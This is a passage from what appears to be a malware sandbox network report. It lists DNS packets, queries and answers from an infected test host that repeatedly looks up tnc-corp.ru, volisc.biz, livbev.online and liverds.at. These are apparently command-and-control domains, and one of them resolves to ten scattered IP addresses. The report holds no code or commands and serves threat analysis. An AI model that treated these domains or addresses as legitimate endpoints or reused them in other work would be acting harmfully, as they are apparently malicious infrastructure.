                                                      Oct 24, 2024 18:39:11.105869055 CEST53616791.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:12.166372061 CEST5167353192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:13.153822899 CEST5167353192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:13.161305904 CEST53516731.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:18.460525036 CEST53516731.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:20.863650084 CEST6436353192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:20.873910904 CEST53643631.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:20.897675037 CEST6516553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:21.888170958 CEST6516553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:22.904638052 CEST6516553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:24.919538021 CEST6516553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:27.112010002 CEST53651651.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:27.112081051 CEST53651651.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:27.112111092 CEST53651651.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:27.112143040 CEST53651651.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:31.873675108 CEST5253753192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:32.872932911 CEST5253753192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:32.880987883 CEST53525371.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:38.116784096 CEST53525371.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:40.589396954 CEST5940053192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:40.602171898 CEST53594001.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:40.604391098 CEST5610553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:41.592582941 CEST5610553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:42.609253883 CEST5610553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:44.624702930 CEST5610553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:46.820019007 CEST53561051.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:46.820038080 CEST53561051.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:46.820044041 CEST53561051.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:46.820339918 CEST53561051.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:51.826590061 CEST4918653192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:52.845719099 CEST4918653192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:53.858628035 CEST4918653192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:55.876540899 CEST4918653192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:58.078646898 CEST53491861.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:58.078690052 CEST53491861.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:58.078747988 CEST53491861.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:58.078775883 CEST53491861.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:58.101263046 CEST6276853192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:58.111707926 CEST53627681.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:58.113786936 CEST5644053192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:59.107065916 CEST5644053192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:00.125298977 CEST5644053192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:02.138252020 CEST5644053192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:04.223443985 CEST53564401.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:04.223489046 CEST53564401.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:04.223519087 CEST53564401.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:04.223643064 CEST53564401.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:09.297966003 CEST6311253192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:10.294504881 CEST6311253192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:11.310251951 CEST6311253192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:11.609256029 CEST53631121.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:11.609308958 CEST53631121.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:11.609339952 CEST53631121.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:12.359304905 CEST5103153192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:13.372755051 CEST5103153192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:14.388329029 CEST5103153192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:16.405164957 CEST5103153192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:18.584759951 CEST53510311.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:18.584814072 CEST53510311.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:18.584844112 CEST53510311.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:18.584871054 CEST53510311.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:18.596683025 CEST5072353192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:18.607841015 CEST53507231.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:18.610503912 CEST5323553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:19.622826099 CEST5323553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:20.622656107 CEST5323553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:22.638307095 CEST5323553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:22.690511942 CEST53532351.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:22.690557003 CEST53532351.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:22.690587997 CEST53532351.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:22.690624952 CEST53532351.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:27.322776079 CEST6363453192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:28.315013885 CEST6363453192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:29.332726955 CEST6363453192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:31.327733994 CEST6363453192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:33.543411016 CEST53636341.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:33.543457985 CEST53636341.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:33.543488026 CEST53636341.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:33.543524027 CEST53636341.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:33.547537088 CEST5912953192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:33.558007956 CEST53591291.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:33.560375929 CEST5081353192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:34.565747976 CEST5081353192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:35.564198971 CEST5081353192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:37.954163074 CEST5081353192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:39.825125933 CEST53508131.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:39.825176001 CEST53508131.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:39.825206041 CEST53508131.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:39.825730085 CEST53508131.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:45.712955952 CEST5140753192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:46.724524975 CEST5140753192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:47.736038923 CEST5140753192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:49.733963013 CEST5140753192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:51.966073036 CEST53514071.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:51.966123104 CEST53514071.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:51.966160059 CEST53514071.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:51.966187954 CEST53514071.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:51.980016947 CEST5154853192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:51.989211082 CEST53515481.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:51.991645098 CEST5895153192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:53.001231909 CEST5895153192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:54.016474962 CEST5895153192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:56.034240961 CEST5895153192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:40:58.242844105 CEST53589511.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:58.242886066 CEST53589511.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:58.242913961 CEST53589511.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:40:58.243598938 CEST53589511.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:41:03.453121901 CEST5171353192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:41:04.451117039 CEST5171353192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:41:05.466629982 CEST5171353192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:41:07.466615915 CEST5171353192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:41:09.679297924 CEST53517131.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:41:09.679366112 CEST53517131.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:41:09.679379940 CEST53517131.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:41:09.679398060 CEST53517131.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:41:09.685657978 CEST5471653192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:41:09.694380999 CEST53547161.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:41:09.702735901 CEST5976253192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:41:10.718682051 CEST5976253192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:41:11.716528893 CEST5976253192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:41:13.716519117 CEST5976253192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:41:16.406060934 CEST53597621.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:41:16.406099081 CEST53597621.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:41:16.406109095 CEST53597621.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:41:16.406213045 CEST53597621.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 24, 2024 18:37:36.562937975 CEST192.168.2.41.1.1.10x4adfStandard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:37.560062885 CEST192.168.2.41.1.1.10x4adfStandard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.575629950 CEST192.168.2.41.1.1.10x4adfStandard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:39.708722115 CEST192.168.2.41.1.1.10x7af7Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:40.700933933 CEST192.168.2.41.1.1.10x7af7Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:41.716922045 CEST192.168.2.41.1.1.10x7af7Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:43.731969118 CEST192.168.2.41.1.1.10x7af7Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:45.990561962 CEST192.168.2.41.1.1.10x3612Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:46.004443884 CEST192.168.2.41.1.1.10xb070Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:46.997514009 CEST192.168.2.41.1.1.10xb070Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:48.013371944 CEST192.168.2.41.1.1.10xb070Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:50.043087006 CEST192.168.2.41.1.1.10xb070Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:38:58.528233051 CEST192.168.2.41.1.1.10xaea2Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:38:59.517595053 CEST192.168.2.41.1.1.10xaea2Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:00.532829046 CEST192.168.2.41.1.1.10xaea2Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:02.544687986 CEST192.168.2.41.1.1.10xaea2Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:04.782851934 CEST192.168.2.41.1.1.10x1c4eStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:04.871172905 CEST192.168.2.41.1.1.10xed8aStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:05.873804092 CEST192.168.2.41.1.1.10xed8aStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:06.894021034 CEST192.168.2.41.1.1.10xed8aStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:08.894138098 CEST192.168.2.41.1.1.10xed8aStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:12.166372061 CEST192.168.2.41.1.1.10x2e23Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:13.153822899 CEST192.168.2.41.1.1.10x2e23Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:20.863650084 CEST192.168.2.41.1.1.10xda34Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:20.897675037 CEST192.168.2.41.1.1.10x236Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:21.888170958 CEST192.168.2.41.1.1.10x236Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:22.904638052 CEST192.168.2.41.1.1.10x236Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:24.919538021 CEST192.168.2.41.1.1.10x236Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:31.873675108 CEST192.168.2.41.1.1.10x256bStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:32.872932911 CEST192.168.2.41.1.1.10x256bStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:40.589396954 CEST192.168.2.41.1.1.10x6b8eStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:40.604391098 CEST192.168.2.41.1.1.10xd3a0Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:41.592582941 CEST192.168.2.41.1.1.10xd3a0Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:42.609253883 CEST192.168.2.41.1.1.10xd3a0Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:44.624702930 CEST192.168.2.41.1.1.10xd3a0Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:51.826590061 CEST192.168.2.41.1.1.10xe9dcStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:52.845719099 CEST192.168.2.41.1.1.10xe9dcStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:53.858628035 CEST192.168.2.41.1.1.10xe9dcStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:55.876540899 CEST192.168.2.41.1.1.10xe9dcStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.101263046 CEST192.168.2.41.1.1.10xf7faStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.113786936 CEST192.168.2.41.1.1.10x5143Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:59.107065916 CEST192.168.2.41.1.1.10x5143Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:00.125298977 CEST192.168.2.41.1.1.10x5143Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:02.138252020 CEST192.168.2.41.1.1.10x5143Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:09.297966003 CEST192.168.2.41.1.1.10xaf62Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:10.294504881 CEST192.168.2.41.1.1.10xaf62Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.310251951 CEST192.168.2.41.1.1.10xaf62Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:12.359304905 CEST192.168.2.41.1.1.10xed1fStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:13.372755051 CEST192.168.2.41.1.1.10xed1fStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:14.388329029 CEST192.168.2.41.1.1.10xed1fStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:16.405164957 CEST192.168.2.41.1.1.10xed1fStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:18.596683025 CEST192.168.2.41.1.1.10x647dStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:18.610503912 CEST192.168.2.41.1.1.10x4f05Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:19.622826099 CEST192.168.2.41.1.1.10x4f05Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:20.622656107 CEST192.168.2.41.1.1.10x4f05Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:22.638307095 CEST192.168.2.41.1.1.10x4f05Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:27.322776079 CEST192.168.2.41.1.1.10xa3Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:28.315013885 CEST192.168.2.41.1.1.10xa3Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:29.332726955 CEST192.168.2.41.1.1.10xa3Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:31.327733994 CEST192.168.2.41.1.1.10xa3Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:33.547537088 CEST192.168.2.41.1.1.10xa1c4Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:33.560375929 CEST192.168.2.41.1.1.10x6fb9Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:34.565747976 CEST192.168.2.41.1.1.10x6fb9Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:35.564198971 CEST192.168.2.41.1.1.10x6fb9Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:37.954163074 CEST192.168.2.41.1.1.10x6fb9Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:45.712955952 CEST192.168.2.41.1.1.10x5737Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:46.724524975 CEST192.168.2.41.1.1.10x5737Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:47.736038923 CEST192.168.2.41.1.1.10x5737Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:49.733963013 CEST192.168.2.41.1.1.10x5737Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:51.980016947 CEST192.168.2.41.1.1.10xc66dStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:51.991645098 CEST192.168.2.41.1.1.10x1c4bStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:53.001231909 CEST192.168.2.41.1.1.10x1c4bStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:54.016474962 CEST192.168.2.41.1.1.10x1c4bStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:56.034240961 CEST192.168.2.41.1.1.10x1c4bStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:03.453121901 CEST192.168.2.41.1.1.10x61e5Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:04.451117039 CEST192.168.2.41.1.1.10x61e5Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:05.466629982 CEST192.168.2.41.1.1.10x61e5Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:07.466615915 CEST192.168.2.41.1.1.10x61e5Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:09.685657978 CEST192.168.2.41.1.1.10x8f3bStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:09.702735901 CEST192.168.2.41.1.1.10x6b31Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:10.718682051 CEST192.168.2.41.1.1.10x6b31Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:11.716528893 CEST192.168.2.41.1.1.10x6b31Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:13.716519117 CEST192.168.2.41.1.1.10x6b31Standard query (0)liverds.atA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru189.164.127.217A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru123.213.233.131A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru201.233.78.169A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru220.125.3.190A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.137.126.27A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru189.61.54.32A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru201.124.145.196A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.46.236.4A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.101.193.110A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru187.204.82.117A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru189.164.127.217A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru123.213.233.131A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru201.233.78.169A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru220.125.3.190A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.137.126.27A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru189.61.54.32A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru201.124.145.196A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.46.236.4A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.101.193.110A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru187.204.82.117A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru189.164.127.217A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru123.213.233.131A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru201.233.78.169A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru220.125.3.190A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.137.126.27A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru189.61.54.32A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru201.124.145.196A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.46.236.4A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.101.193.110A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru187.204.82.117A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:45.982157946 CEST1.1.1.1192.168.2.40x7af7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:45.982176065 CEST1.1.1.1192.168.2.40x7af7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:45.982188940 CEST1.1.1.1192.168.2.40x7af7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:45.982542992 CEST1.1.1.1192.168.2.40x7af7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:46.001085043 CEST1.1.1.1192.168.2.40x3612Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:52.265104055 CEST1.1.1.1192.168.2.40xb070Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:52.265126944 CEST1.1.1.1192.168.2.40xb070Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:52.265140057 CEST1.1.1.1192.168.2.40xb070Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:52.265301943 CEST1.1.1.1192.168.2.40xb070Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:04.717839956 CEST1.1.1.1192.168.2.40xaea2Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:04.717888117 CEST1.1.1.1192.168.2.40xaea2Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
